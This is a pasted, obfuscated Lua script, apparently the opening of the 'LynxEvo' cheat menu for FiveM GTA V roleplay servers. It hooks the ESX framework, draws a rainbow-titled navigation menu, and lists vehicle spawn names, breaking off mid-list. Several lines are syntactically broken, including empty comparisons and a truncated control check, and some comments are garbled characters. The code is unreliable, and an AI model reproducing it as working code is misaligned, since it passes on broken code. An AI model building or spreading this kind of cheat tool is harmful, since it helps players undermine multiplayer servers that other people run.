

Sep 22nd, 2019
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  1. local mhaonn = true
  2. ESX = nil
  3. Citizen.CreateThread(
  4. function()
  5. while ESX == nil do
  6. TriggerEvent(
  7. 'esx:getSharedObject',
  8. function(a)
  9. ESX = a
  10. end
  11. )
  12. Citizen.Wait(1000)
  13. end
  14. end
  15. )
  16. local function e()
  17. local name = GetPlayerName(PlayerId())
  18. end
  19. local h = false
  20. rot = 1
  21. local j = false
  22. LynxEvo = {}
  23. LynxEvo.debug = false
  24. local function k(l)
  25. local m = {}
  26. local n = GetGameTimer() / 200
  27. m.r = math.floor(math.sin(n * l + 0) * 127 + 128)
  28. m.g = math.floor(math.sin(n * l + 2) * 127 + 128)
  29. m.b = math.floor(math.sin(n * l + 4) * 127 + 128)
  30. return m
  31. end
  32. local o = {}
  33. local p = {
  34. up = 172,
  35. down = 173,
  36. left = 174,
  37. right = 175,
  38. select = 176,
  39. back = 177
  40. }
  41. local q = 0
  42. local s = nil
  43. local t = nil
  44. local u = 0.23
  45. local v = 0.11
  46. local w = 0.03
  47. local A = 1.0
  48. local B = 0.041
  49. local C = 0
  50. local D = 0.370
  51. local E = 0.005
  52. local F = 0.005
  53. local G = '34ByTe Community'
  54. local function H(I)
  55. if LynxEvo.debug then
  56. Citizen.Trace('[LynxEvo] ' .. tostring(I))
  57. end
  58. end
  59. local function J(f, K, value)
  60. if f and o[f] then
  61. o[f][K] = value
  62. H(f .. ' menu property changed: { ' .. tostring(K) .. ', ' .. tostring(value) .. ' }')
  63. end
  64. end
  65. local function L(f)
  66. if f and o[f] then
  67. return o[f].visible
  68. else
  69. return false
  70. end
  71. end
  72. local function M(f, N, O)
  73. if f and o[f] then
  74. J(f, 'visible', N)
  75. if not O and o[f] then
  76. J(f, 'currentOption', 1)
  77. end
  78. if N then
  79. if f ~= t and L(t) then
  80. M(t, false)
  81. end
  82. t = f
  83. end
  84. end
  85. end
  86. local function P(I, x, y, Q, R, S, T, U, V)
  87. SetTextColour(R.r, R.g, R.b, R.a)
  88. SetTextFont(Q)
  89. SetTextScale(S, S)
  90. if U then
  91. SetTextDropShadow(2, 2, 0, 0, 0)
  92. end
  93. if o[t] then
  94. if T then
  95. SetTextCentre(T)
  96. elseif V then
  97. SetTextWrap(o[t].x, o[t].x + u - E)
  98. SetTextRightJustify(true)
  99. end
  100. end
  101. SetTextEntry('STRING')
  102. AddTextComponentString(I)
  103. DrawText(x, y)
  104. end
  105. local function W(x, y, X, height, R)
  106. DrawRect(x, y, X, height, R.r, R.g, R.b, R.a)
  107. end
  108. local function Y()
  109. if o[t] then
  110. local x = o[t].x + u / 2
  111. local y = o[t].y + v / 2
  112. if o[t].titleBackgroundSprite then
  113. DrawSprite(
  114. o[t].titleBackgroundSprite.dict,
  115. o[t],
  116. x,
  117. y,
  118. u,
  119. v,
  120. 0.,
  121. 255,
  122. 255,
  123. 255,
  124. 255
  125. )
  126. else
  127. W(x, y, u, v, o[t].titleBackgroundColor)
  128. end
  129. P(o[t].title, x, y - v / 2 + w, o[t].titleFont, o[t].titleColor, A, true)
  130. end
  131. end
  132. local function Z()
  133. if o[t] then
  134. local x = o[t].x + u / 2
  135. local y = o[t].y + v + B / 2
  136. local a0 = {
  137. r = o[t].titleBackgroundColor.r,
  138. g = o[t].titleBackgroundColor.g,
  139. b = o[t].titleBackgroundColor.b,
  140. a = 255
  141. }
  142. W(x, y, u, B, o[t].subTitleBackgroundColor)
  143. P(o[t].subTitle, o[t].x + E, y - B / 2 + F, C, a0, D, false)
  144. if q > o[t].maxOptionCount then
  145. P(
  146. tostring(o[t].currentOption) .. ' / ' .. tostring(q),
  147. o[t].x + u,
  148. y - B / 2 + F,
  149. C,
  150. a0,
  151. D,
  152. false,
  153. false,
  154. true
  155. )
  156. end
  157. end
  158. end
  159. local function a1(I, a2)
  160. local x = o[t].x + u / 2
  161. local a3 = nil
  162. if o[t].currentOption <= o[t].maxOptionCount and q <= o[t].maxOptionCount then
  163. a3 = q
  164. elseif q > o[t].currentOption - o[t].maxOptionCount and q <= o[t].currentOption then
  165. a3 = q - (o[t].currentOption - o[t].maxOptionCount)
  166. end
  167. if a3 then
  168. local y = o[t].y + v + B + B * a3 - B / 2
  169. local a4 = nil
  170. local a5 = nil
  171. local a6 = nil
  172. local U = false
  173. if o[t].currentOption == q then
  174. a4 = o[t].menuFocusBackgroundColor
  175. a5 = o[t].menuFocusTextColor
  176. a6 = o[t].menuFocusTextColor
  177. else
  178. a4 = o[t].menuBackgroundColor
  179. a5 = o[t].menuTextColor
  180. a6 = o[t].menuSubTextColor
  181. U = true
  182. end
  183. W(x, y, u, B, a4)
  184. P(I, o[t].x + E, y - B / 2 + F, C, a5, D, false, U)
  185. if a2 then
  186. P(a2, o[t].x + E, y - B / 2 + F, C, a6, D, false, U, true)
  187. end
  188. end
  189. end
  191. function LynxEvo.CreateMenu(f, a7)
  192. o[f] = {}
  193. o[f].title = a7
  194. o[f].subTitle = G
  195. o[f].visible = false
  196. o[f].previousMenu = nil
  197. o[f].aboutToBeClosed = false
  198. o[f].x = 0.75
  199. o[f].y = 0.19
  200. o[f].currentOption = 1
  201. o[f].maxOptionCount = 10
  202. o[f].titleFont = 2
  203. o[f].titleColor = {
  204. r = 255,
  205. g = 255,
  206. b = 255,
  207. a = 255
  208. }
  209. Citizen.CreateThread(
  210. function()
  211. while true do
  212. Citizen.Wait(0)
  213. local a8 = k(1.0)
  214. o[f].titleBackgroundColor = {
  215. r = a8.r,
  216. g = a8.g,
  217. b = a8.b,
  218. a = 105
  219. }
  220. o[f].menuFocusBackgroundColor = {
  221. r = 255,
  222. g = 255,
  223. b = 255,
  224. a = 100
  225. }
  226. end
  227. end
  228. )
  229. o[f].titleBackgroundSprite = nil
  230. o[f].menuTextColor = {
  231. r = 255,
  232. g = 255,
  233. b = 255,
  234. a = 255
  235. }
  236. o[f].menuSubTextColor = {
  237. r = 189,
  238. g = 189,
  239. b = 189,
  240. a = 255
  241. }
  242. o[f].menuFocusTextColor = {
  243. r = 255,
  244. g = 255,
  245. b = 255,
  246. a = 255
  247. }
  248. o[f].menuBackgroundColor = {
  249. r = 0,
  250. g = 0,
  251. b = 0,
  252. a = 100
  253. }
  254. o[f].subTitleBackgroundColor = {
  255. r = o[f].menuBackgroundColor.r,
  256. g = o[f].menuBackgroundColor.g,
  257. b = o[f].menuBackgroundColor.b,
  258. a = 255
  259. }
  260. o[f].buttonPressedSound = {
  261. name = '~h~~r~> ~s~SELECT',
  263. }
  264. H(tostring(f) .. ' menu created')
  265. end
  267. function LynxEvo.CreateSubMenu(f, a9, aa)
  268. if o[a9] then
  269. LynxEvo.CreateMenu(f, o[a9].title)
  270. if aa then
  271. J(f, 'subTitle', aa)
  272. else
  273. J(f, 'subTitle', o[a9].subTitle)
  274. end
  275. J(f, 'previousMenu', a9)
  276. J(f, 'x', o[a9].x)
  277. J(f, 'y', o[a9].y)
  278. J(f, 'maxOptionCount', o[a9].maxOptionCount)
  279. J(f, 'titleFont', o[a9].titleFont)
  280. J(f, 'titleColor', o[a9].titleColor)
  281. J(f, 'titleBackgroundColor', o[a9].titleBackgroundColor)
  282. J(f, 'titleBackgroundSprite', o[a9].titleBackgroundSprite)
  283. J(f, 'menuTextColor', o[a9].menuTextColor)
  284. J(f, 'menuSubTextColor', o[a9].menuSubTextColor)
  285. J(f, 'menuFocusTextColor', o[a9].menuFocusTextColor)
  286. J(f, 'menuFocusBackgroundColor', o[a9].menuFocusBackgroundColor)
  287. J(f, 'menuBackgroundColor', o[a9].menuBackgroundColor)
  288. J(f, 'subTitleBackgroundColor', o[a9].subTitleBackgroundColor)
  289. else
  290. H('Failed to create ' .. tostring(f) .. ' submenu: ' .. tostring(a9) .. " parent menu doesn't exist")
  291. end
  292. end
  294. function LynxEvo.CurrentMenu()
  295. return t
  296. end
  298. function LynxEvo.OpenMenu(f)
  299. if f and o[f] then
  300. PlaySoundFrontend(-1, 'SELECT', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  301. M(f, true)
  302. if o[f].titleBackgroundSprite then
  303. RequestStreamedTextureDict(o[f].titleBackgroundSprite.dict, false)
  304. while not HasStreamedTextureDictLoaded(o[f].titleBackgroundSprite.dict) do
  305. Citizen.Wait(0)
  306. end
  307. end
  308. H(tostring(f) .. ' menu opened')
  309. else
  310. H('Failed to open ' .. tostring(f) .. " menu: it doesn't exist")
  311. end
  312. end
  314. function LynxEvo.IsMenuOpened(f)
  315. return L(f)
  316. end
  318. function LynxEvo.IsAnyMenuOpened()
  319. for f, _ in pairs(o) do
  320. if L(f) then
  321. return true
  322. end
  323. end
  324. return false
  325. end
  327. function LynxEvo.IsMenuAboutToBeClosed()
  328. if o[t] then
  329. return o[t].aboutToBeClosed
  330. else
  331. return false
  332. end
  333. end
  335. function LynxEvo.CloseMenu()
  336. if o[t] then
  337. if o[t].aboutToBeClosed then
  338. o[t].aboutToBeClosed = false
  339. M(t, false)
  340. H(tostring(t) .. ' menu closed')
  341. PlaySoundFrontend(-1, 'QUIT', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  342. q = 0
  343. t = nil
  344. s = nil
  345. else
  346. o[t].aboutToBeClosed = true
  347. H(tostring(t) .. ' menu about to be closed')
  348. end
  349. end
  350. end
  352. function LynxEvo.Button(I, a2)
  353. local ab = I
  354. if a2 then
  355. ab = '{ ' .. tostring(ab) .. ', ' .. tostring(a2) .. ' }'
  356. end
  357. if o[t] then
  358. q = q + 1
  359. local ac = o[t].currentOption == q
  360. a1(I, a2)
  361. if ac then
  362. if s == then
  363. PlaySoundFrontend(-1, o[t], o[t].buttonPressedSound.set, true)
  364. H(ab .. ' button pressed')
  365. return true
  366. elseif s == p.left or s == p.right then
  367. PlaySoundFrontend(-1, 'NAV_UP_DOWN', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  368. end
  369. end
  370. return false
  371. else
  372. H('Failed to create ' .. ab .. ' button: ' .. tostring(t) .. " menu doesn't exist")
  373. return false
  374. end
  375. end
  377. function LynxEvo.MenuButton(I, f)
  378. if o[f] then
  379. if LynxEvo.Button(I) then
  380. M(t, false)
  381. M(f, true, true)
  382. return true
  383. end
  384. else
  385. H('Failed to create ' .. tostring(I) .. ' menu button: ' .. tostring(f) .. " submenu doesn't exist")
  386. end
  387. return false
  388. end
  390. function LynxEvo.CheckBox(I, bool, ad)
  391. local ae = '~r~~h~OFF'
  392. if bool then
  393. ae = '~g~~h~ON'
  394. end
  395. if LynxEvo.Button(I, ae) then
  396. bool = not bool
  397. H(tostring(I) .. ' checkbox changed to ' .. tostring(bool))
  398. ad(bool)
  399. return true
  400. end
  401. return false
  402. end
  404. function LynxEvo.ComboBox(I, af, ag, ah, ad)
  405. local ai = #af
  406. local aj = af[ag]
  407. local ac = o[t].currentOption == q + 1
  408. if ai > 1 and ac then
  409. aj = '??' .. tostring(aj) .. ' ??
  410. end
  411. if LynxEvo.Button(I, aj) then
  412. ah = ag
  413. ad(ag, ah)
  414. return true
  415. elseif ac then
  416. if s == p.left then
  417. if ag > 1 then
  418. ag = ag - 1
  419. else
  420. ag = ai
  421. end
  422. elseif s == p.right then
  423. if ag < ai then
  424. ag = ag + 1
  425. else
  426. ag = 1
  427. end
  428. end
  429. else
  430. ag = ah
  431. end
  432. ad(ag, ah)
  433. return false
  434. end
  436. function LynxEvo.Display()
  437. if L(t) then
  438. if o[t].aboutToBeClosed then
  439. LynxEvo.CloseMenu()
  440. else
  441. ClearAllHelpMessages()
  442. Y()
  443. Z()
  444. s = nil
  445. if IsDisabledControlJustPressed(0, p.down) then
  446. PlaySoundFrontend(-1, 'NAV_UP_DOWN', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  447. if o[t].currentOption < q then
  448. o[t].currentOption = o[t].currentOption + 1
  449. else
  450. o[t].currentOption = 1
  451. end
  452. elseif IsDisabledControlJustPressed(0, p.up) then
  453. PlaySoundFrontend(-1, 'NAV_UP_DOWN', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  454. if o[t].currentOption > 1 then
  455. o[t].currentOption = o[t].currentOption - 1
  456. else
  457. o[t].currentOption = q
  458. end
  459. elseif IsDisabledControlJustPressed(0, p.left) then
  460. s = p.left
  461. elseif IsDisabledControlJustPressed(0, p.right) then
  462. s = p.right
  463. elseif IsDisabledControlJustPressed(0, then
  464. s =
  465. elseif IsDisabledControlJustPressed(0, p.back) then
  466. if o[o[t].previousMenu] then
  467. PlaySoundFrontend(-1, 'BACK', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  468. M(o[t].previousMenu, true)
  469. else
  470. LynxEvo.CloseMenu()
  471. end
  472. end
  473. q = 0
  474. end
  475. end
  476. end
  478. function LynxEvo.SetMenuWidth(f, X)
  479. J(f, 'width', X)
  480. end
  482. function LynxEvo.SetMenuX(f, x)
  483. J(f, 'x', x)
  484. end
  486. function LynxEvo.SetMenuY(f, y)
  487. J(f, 'y', y)
  488. end
  490. function LynxEvo.SetMenuMaxOptionCountOnScreen(f, count)
  491. J(f, 'maxOptionCount', count)
  492. end
  494. function LynxEvo.SetTitleColor(f, r, g, b, ak)
  495. J(
  496. f,
  497. 'titleColor',
  498. {
  499. ['r'] = r,
  500. ['g'] = g,
  501. ['b'] = b,
  502. ['a'] = ak or o[f].titleColor.a
  503. }
  504. )
  505. end
  507. function LynxEvo.SetTitleBackgroundColor(f, r, g, b, ak)
  508. J(
  509. f,
  510. 'titleBackgroundColor',
  511. {
  512. ['r'] = r,
  513. ['g'] = g,
  514. ['b'] = b,
  515. ['a'] = ak or o[f].titleBackgroundColor.a
  516. }
  517. )
  518. end
  520. function LynxEvo.SetTitleBackgroundSprite(f, al, am)
  521. J(
  522. f,
  523. 'titleBackgroundSprite',
  524. {
  525. dict = al,
  526. name = am
  527. }
  528. )
  529. end
  531. function LynxEvo.SetSubTitle(f, I)
  532. J(f, 'subTitle', I)
  533. end
  535. function LynxEvo.SetMenuBackgroundColor(f, r, g, b, ak)
  536. J(
  537. f,
  538. 'menuBackgroundColor',
  539. {
  540. ['r'] = r,
  541. ['g'] = g,
  542. ['b'] = b,
  543. ['a'] = ak or o[f].menuBackgroundColor.a
  544. }
  545. )
  546. end
  548. function LynxEvo.SetMenuTextColor(f, r, g, b, ak)
  549. J(
  550. f,
  551. 'menuTextColor',
  552. {
  553. ['r'] = r,
  554. ['g'] = g,
  555. ['b'] = b,
  556. ['a'] = ak or o[f].menuTextColor.a
  557. }
  558. )
  559. end
  561. function LynxEvo.SetMenuSubTextColor(f, r, g, b, ak)
  562. J(
  563. f,
  564. 'menuSubTextColor',
  565. {
  566. ['r'] = r,
  567. ['g'] = g,
  568. ['b'] = b,
  569. ['a'] = ak or o[f].menuSubTextColor.a
  570. }
  571. )
  572. end
  574. function LynxEvo.SetMenuFocusColor(f, r, g, b, ak)
  575. J(
  576. f,
  577. 'menuFocusColor',
  578. {
  579. ['r'] = r,
  580. ['g'] = g,
  581. ['b'] = b,
  582. ['a'] = ak or o[f].menuFocusColor.a
  583. }
  584. )
  585. end
  587. function LynxEvo.SetMenuButtonPressedSound(f, name, an)
  588. J(
  589. f,
  590. 'buttonPressedSound',
  591. {
  592. ['name'] = name,
  593. ['set'] = an
  594. }
  595. )
  596. end
  598. function KeyboardInput(ao, ap, aq)
  599. AddTextEntry('FMMC_KEY_TIP1', ao .. ':')
  600. DisplayOnscreenKeyboard(1, 'FMMC_KEY_TIP1', '', ap, '', '', '', aq)
  601. blockinput = true
  602. while UpdateOnscreenKeyboard() ~= 1 and UpdateOnscreenKeyboard() ~= 2 do
  603. Citizen.Wait(0)
  604. end
  605. if UpdateOnscreenKeyboard() ~= 2 then
  606. AddTextEntry('FMMC_KEY_TIP1', '')
  607. local m = GetOnscreenKeyboardResult()
  608. Citizen.Wait(500)
  609. blockinput = false
  610. return m
  611. else
  612. AddTextEntry('FMMC_KEY_TIP1', '')
  613. Citizen.Wait(500)
  614. blockinput = false
  615. return nil
  616. end
  617. end
  618. local function ar()
  619. local as = {}
  620. for i = 0, GetNumberOfPlayers() do
  621. if NetworkIsPlayerActive(i) then
  622. as[#as + 1] = i
  623. end
  624. end
  625. return as
  626. end
  628. function DrawText3D(x, y, z, I, r, g, b)
  629. SetDrawOrigin(x, y, z, 0)
  630. SetTextFont(0)
  631. SetTextProportional(0)
  632. SetTextScale(0.0, 0.20)
  633. SetTextColour(r, g, b, 255)
  634. SetTextDropshadow(0, 0, 0, 0, 255)
  635. SetTextEdge(2, 0, 0, 0, 150)
  636. SetTextDropShadow()
  637. SetTextOutline()
  638. SetTextEntry('STRING')
  639. SetTextCentre(1)
  640. AddTextComponentString(I)
  641. DrawText(0.0, 0.0)
  642. ClearDrawOrigin()
  643. end
  645. function math.round(at, au)
  646. return tonumber(string.format('%.' .. (au or 0) .. 'f', at))
  647. end
  648. local function k(l)
  649. local m = {}
  650. local n = GetGameTimer() / 1000
  651. m.r = math.floor(math.sin(n * l + 0) * 127 + 128)
  652. m.g = math.floor(math.sin(n * l + 2) * 127 + 128)
  653. m.b = math.floor(math.sin(n * l + 4) * 127 + 128)
  654. return m
  655. end
  656. local function av(I)
  657. SetNotificationTextEntry('STRING')
  658. AddTextComponentString(I)
  659. DrawNotification(aw, false)
  660. if rgbnot then
  661. for i = 0, 24 do
  662. i = i + 1
  663. SetNotificationBackgroundColor(i)
  664. end
  665. else
  666. SetNotificationBackgroundColor(25) -- ?몄튂?됱긽 //
  667. end
  668. end
  670. function checkValidVehicleExtras()
  671. local ax = PlayerPedId()
  672. local ay = GetVehiclePedIsIn(ax, false)
  673. local az = {}
  674. for i = 0, 50, 1 do
  675. if DoesExtraExist(ay, i) then
  676. local aA = '~h~Extra #' .. tostring(i)
  677. local I = 'OFF'
  678. if IsVehicleExtraTurnedOn(ay, i) then
  679. I = 'ON'
  680. end
  681. local aB = '~h~extra ' .. tostring(i)
  682. table.insert(
  683. az,
  684. {
  685. menuName = realModName,
  686. data = {
  687. ['action'] = realSpawnName,
  688. ['state'] = I
  689. }
  690. }
  691. )
  692. end
  693. end
  694. return az
  695. end
  697. function DoesVehicleHaveExtras(veh)
  698. for i = 1, 30 do
  699. if DoesExtraExist(veh, i) then
  700. return true
  701. end
  702. end
  703. return false
  704. end
  706. function checkValidVehicleMods(aC)
  707. local ax = PlayerPedId()
  708. local ay = GetVehiclePedIsIn(ax, false)
  709. local az = {}
  710. local aD = GetNumVehicleMods(ay, aC)
  711. if aC == 48 and aD == 0 then
  712. local aD = GetVehicleLiveryCount(ay)
  713. for i = 1, aD, 1 do
  714. local aE = i - 1
  715. local aF = GetLiveryName(ay, aE)
  716. local realModName = GetLabelText(aF)
  717. local aG, realSpawnName = aC, aE
  718. az[i] = {
  719. menuName = realModName,
  720. data = {
  721. ['modid'] = aG,
  722. ['realIndex'] = realSpawnName
  723. }
  724. }
  725. end
  726. end
  727. for i = 1, aD, 1 do
  728. local aE = i - 1
  729. local aF = GetModTextLabel(ay, aC, aE)
  730. local realModName = GetLabelText(aF)
  731. local aG, realSpawnName = aD, aE
  732. az[i] = {
  733. menuName = realModName,
  734. data = {
  735. ['modid'] = aG,
  736. ['realIndex'] = realSpawnName
  737. }
  738. }
  739. end
  740. if aD > 0 then
  741. local aE = -1
  742. local aG, realSpawnName = aC, aE
  743. table.insert(
  744. az,
  745. 1,
  746. {
  747. menuName = 'Stock',
  748. data = {
  749. ['modid'] = aG,
  750. ['realIndex'] = realSpawnName
  751. }
  752. }
  753. )
  754. end
  755. return az
  756. end
  757. local aH = {
  758. 'Dinghy',
  759. 'Dinghy2',
  760. 'Dinghy3',
  761. 'Dingh4',
  762. 'Jetmax',
  763. 'Marquis',
  764. 'Seashark',
  765. 'Seashark2',
  766. 'Seashark3',
  767. 'Speeder',
  768. 'Speeder2',
  769. 'Squalo',
  770. 'Submersible',
  771. 'Submersible2',
  772. 'Suntrap',
  773. 'Toro',
  774. 'Toro2',
  775. 'Tropic',
  776. 'Tropic2',
  777. 'Tug'
  778. }
  779. local aI = {
  780. 'Benson',
  781. 'Biff',
  782. 'Cerberus',
  783. 'Cerberus2',
  784. 'Cerberus3',
  785. 'Hauler',
  786. 'Hauler2',
  787. 'Mule',
  788. 'Mule2',
  789. 'Mule3',
  790. 'Mule4',
  791. 'Packer',
  792. 'Phantom',
  793. 'Phantom2',
  794. 'Phantom3',
  795. 'Pounder',
  796. 'Pounder2',
  797. 'Stockade',
  798. 'Stockade3',
  799. 'Terbyte'
  800. }
  801. local aJ = {
  802. 'Blista',
  803. 'Blista2',
  804. 'Blista3',
  805. 'Brioso',
  806. 'Dilettante',
  807. 'Dilettante2',
  808. 'Issi2',
  809. 'Issi3',
  810. 'issi4',
  811. 'Iss5',
  812. 'issi6',
  813. 'Panto',
  814. 'Prarire',
  815. 'Rhapsody'
  816. }
  817. local aK = {
  818. 'CogCabrio',
  819. 'Exemplar',
  820. 'F620',
  821. 'Felon',
  822. 'Felon2',
  823. 'Jackal',
  824. 'Oracle',
  825. 'Oracle2',
  826. 'Sentinel',
  827. 'Sentinel2',
  828. 'Windsor',
  829. 'Windsor2',
  830. 'Zion',
  831. 'Zion2'
  832. }
  833. local aL = {
  834. 'Bmx',
  835. 'Cruiser',
  836. 'Fixter',
  837. 'Scorcher',
  838. 'Tribike',
  839. 'Tribike2',
  840. 'tribike3'
  841. }
  842. local aM = {
  843. 'ambulance',
  844. 'FBI',
  845. 'FBI2',
  846. 'FireTruk',
  847. 'PBus',
  848. 'police',
  849. 'Police2',
  850. 'Police3',
  851. 'Police4',
  852. 'PoliceOld1',
  853. 'PoliceOld2',
  854. 'PoliceT',
  855. 'Policeb',
  856. 'Polmav',
  857. 'Pranger',
  858. 'Predator',
  859. 'Riot',
  860. 'Riot2',
  861. 'Sheriff',
  862. 'Sheriff2'
  863. }
  864. local aN = {
  865. 'Akula',
  866. 'Annihilator',
  867. 'Buzzard',
  868. 'Buzzard2',
  869. 'Cargobob',
  870. 'Cargobob2',
  871. 'Cargobob3',
  872. 'Cargobob4',
  873. 'Frogger',
  874. 'Frogger2',
  875. 'Havok',
  876. 'Hunter',
  877. 'Maverick',
  878. 'Savage',
  879. 'Seasparrow',
  880. 'Skylift',
  881. 'Supervolito',
  882. 'Supervolito2',
  883. 'Swift',
  884. 'Swift2',
  885. 'Valkyrie',
  886. 'Valkyrie2',
  887. 'Volatus'
  888. }
  889. local aO = {
  890. 'Bulldozer',
  891. 'Cutter',
  892. 'Dump',
  893. 'Flatbed',
  894. 'Guardian',
  895. 'Handler',
  896. 'Mixer',
  897. 'Mixer2',
  898. 'Rubble',
  899. 'Tiptruck',
  900. 'Tiptruck2'
  901. }
  902. local aP = {
  903. 'APC',
  904. 'Barracks',
  905. 'Barracks2',
  906. 'Barracks3',
  907. 'Barrage',
  908. 'Chernobog',
  909. 'Crusader',
  910. 'Halftrack',
  911. 'Khanjali',
  912. 'Rhino',
  913. 'Scarab',
  914. 'Scarab2',
  915. 'Scarab3',
  916. 'Thruster',
  917. 'Trailersmall2'
  918. }
  919. local aQ = {
  920. 'Akuma',
  921. 'Avarus',
  922. 'Bagger',
  923. 'Bati2',
  924. 'Bati',
  925. 'BF400',
  926. 'Blazer4',
  927. 'CarbonRS',
  928. 'Chimera',
  929. 'Cliffhanger',
  930. 'Daemon',
  931. 'Daemon2',
  932. 'Defiler',
  933. 'Deathbike',
  934. 'Deathbike2',
  935. 'Deathbike3',
  936. 'Diablous',
  937. 'Diablous2',
  938. 'Double',
  939. 'Enduro',
  940. 'esskey',
  941. 'Faggio2',
  942. 'Faggio3',
  943. 'Faggio',
  944. 'Fcr2',
  945. 'fcr',
  946. 'gargoyle',
  947. 'hakuchou2',
  948. 'hakuchou',
  949. 'hexer',
  950. 'innovation',
  951. 'Lectro',
  952. 'Manchez',
  953. 'Nemesis',
  954. 'Nightblade',
  955. 'Oppressor',
  956. 'Oppressor2',
  957. 'PCJ',
  958. 'Ratbike',
  959. 'Ruffian',
  960. 'Sanchez2',
  961. 'Sanchez',
  962. 'Sanctus',
  963. 'Shotaro',
  964. 'Sovereign',
  965. 'Thrust',
  966. 'Vader',
  967. 'Vindicator',
  968. 'Vortex',
  969. 'Wolfsbane',
  970. 'zombiea',
  971. 'zombieb'
  972. }
  973. local aR = {
  974. 'Blade',
  975. 'Buccaneer',
  976. 'Buccaneer2',
  977. 'Chino',
  978. 'Chino2',
  979. 'clique',
  980. 'Deviant',
  981. 'Dominator',
  982. 'Dominator2',
  983. 'Dominator3',
  984. 'Dominator4',
  985. 'Dominator5',
  986. 'Dominator6',
  987. 'Dukes',
  988. 'Dukes2',
  989. 'Ellie',
  990. 'Faction',
  991. 'faction2',
  992. 'faction3',
  993. 'Gauntlet',
  994. 'Gauntlet2',
  995. 'Hermes',
  996. 'Hotknife',
  997. 'Hustler',
  998. 'Impaler',
  999. 'Impaler2',
  1000. 'Impaler3',
  1001. 'Impaler4',
  1002. 'Imperator',
  1003. 'Imperator2',
  1004. 'Imperator3',
  1005. 'Lurcher',
  1006. 'Moonbeam',
  1007. 'Moonbeam2',
  1008. 'Nightshade',
  1009. 'Phoenix',
  1010. 'Picador',
  1011. 'RatLoader',
  1012. 'RatLoader2',
  1013. 'Ruiner',
  1014. 'Ruiner2',
  1015. 'Ruiner3',
  1016. 'SabreGT',
  1017. 'SabreGT2',
  1018. 'Sadler2',
  1019. 'Slamvan',
  1020. 'Slamvan2',
  1021. 'Slamvan3',
  1022. 'Slamvan4',
  1023. 'Slamvan5',
  1024. 'Slamvan6',
  1025. 'Stalion',
  1026. 'Stalion2',
  1027. 'Tampa',
  1028. 'Tampa3',
  1029. 'Tulip',
  1030. 'Vamos,',
  1031. 'Vigero',
  1032. 'Virgo',
  1033. 'Virgo2',
  1034. 'Virgo3',
  1035. 'Voodoo',
  1036. 'Voodoo2',
  1037. 'Yosemite'
  1038. }
  1039. local aS = {
  1040. 'BFinjection',
  1041. 'Bifta',
  1042. 'Blazer',
  1043. 'Blazer2',
  1044. 'Blazer3',
  1045. 'Blazer5',
  1046. 'Bohdi',
  1047. 'Brawler',
  1048. 'Bruiser',
  1049. 'Bruiser2',
  1050. 'Bruiser3',
  1051. 'Caracara',
  1052. 'DLoader',
  1053. 'Dune',
  1054. 'Dune2',
  1055. 'Dune3',
  1056. 'Dune4',
  1057. 'Dune5',
  1058. 'Insurgent',
  1059. 'Insurgent2',
  1060. 'Insurgent3',
  1061. 'Kalahari',
  1062. 'Kamacho',
  1063. 'LGuard',
  1064. 'Marshall',
  1065. 'Mesa',
  1066. 'Mesa2',
  1067. 'Mesa3',
  1068. 'Monster',
  1069. 'Monster4',
  1070. 'Monster5',
  1071. 'Nightshark',
  1072. 'RancherXL',
  1073. 'RancherXL2',
  1074. 'Rebel',
  1075. 'Rebel2',
  1076. 'RCBandito',
  1077. 'Riata',
  1078. 'Sandking',
  1079. 'Sandking2',
  1080. 'Technical',
  1081. 'Technical2',
  1082. 'Technical3',
  1083. 'TrophyTruck',
  1084. 'TrophyTruck2',
  1085. 'Freecrawler',
  1086. 'Menacer'
  1087. }
  1088. local aT = {
  1089. 'AlphaZ1',
  1090. 'Avenger',
  1091. 'Avenger2',
  1092. 'Besra',
  1093. 'Blimp',
  1094. 'blimp2',
  1095. 'Blimp3',
  1096. 'Bombushka',
  1097. 'Cargoplane',
  1098. 'Cuban800',
  1099. 'Dodo',
  1100. 'Duster',
  1101. 'Howard',
  1102. 'Hydra',
  1103. 'Jet',
  1104. 'Lazer',
  1105. 'Luxor',
  1106. 'Luxor2',
  1107. 'Mammatus',
  1108. 'Microlight',
  1109. 'Miljet',
  1110. 'Mogul',
  1111. 'Molotok',
  1112. 'Nimbus',
  1113. 'Nokota',
  1114. 'Pyro',
  1115. 'Rogue',
  1116. 'Seabreeze',
  1117. 'Shamal',
  1118. 'Starling',
  1119. 'Stunt',
  1120. 'Titan',
  1121. 'Tula',
  1122. 'Velum',
  1123. 'Velum2',
  1124. 'Vestra',
  1125. 'Volatol',
  1126. 'Striekforce'
  1127. }
  1128. local aU = {
  1129. 'BJXL',
  1130. 'Baller',
  1131. 'Baller2',
  1132. 'Baller3',
  1133. 'Baller4',
  1134. 'Baller5',
  1135. 'Baller6',
  1136. 'Cavalcade',
  1137. 'Cavalcade2',
  1138. 'Dubsta',
  1139. 'Dubsta2',
  1140. 'Dubsta3',
  1141. 'FQ2',
  1142. 'Granger',
  1143. 'Gresley',
  1144. 'Habanero',
  1145. 'Huntley',
  1146. 'Landstalker',
  1147. 'patriot',
  1148. 'Patriot2',
  1149. 'Radi',
  1150. 'Rocoto',
  1151. 'Seminole',
  1152. 'Serrano',
  1153. 'Toros',
  1154. 'XLS',
  1155. 'XLS2'
  1156. }
  1157. local aV = {
  1158. 'Asea',
  1159. 'Asea2',
  1160. 'Asterope',
  1161. 'Cog55',
  1162. 'Cogg552',
  1163. 'Cognoscenti',
  1164. 'Cognoscenti2',
  1165. 'emperor',
  1166. 'emperor2',
  1167. 'emperor3',
  1168. 'Fugitive',
  1169. 'Glendale',
  1170. 'ingot',
  1171. 'intruder',
  1172. 'limo2',
  1173. 'premier',
  1174. 'primo',
  1175. 'primo2',
  1176. 'regina',
  1177. 'romero',
  1178. 'stafford',
  1179. 'Stanier',
  1180. 'stratum',
  1181. 'stretch',
  1182. 'surge',
  1183. 'tailgater',
  1184. 'warrener',
  1185. 'Washington'
  1186. }
  1187. local aW = {
  1188. 'Airbus',
  1189. 'Brickade',
  1190. 'Bus',
  1191. 'Coach',
  1192. 'Rallytruck',
  1193. 'Rentalbus',
  1194. 'taxi',
  1195. 'Tourbus',
  1196. 'Trash',
  1197. 'Trash2',
  1198. 'WastIndr',
  1199. 'PBus2'
  1200. }
  1201. local aX = {
  1202. 'Alpha',
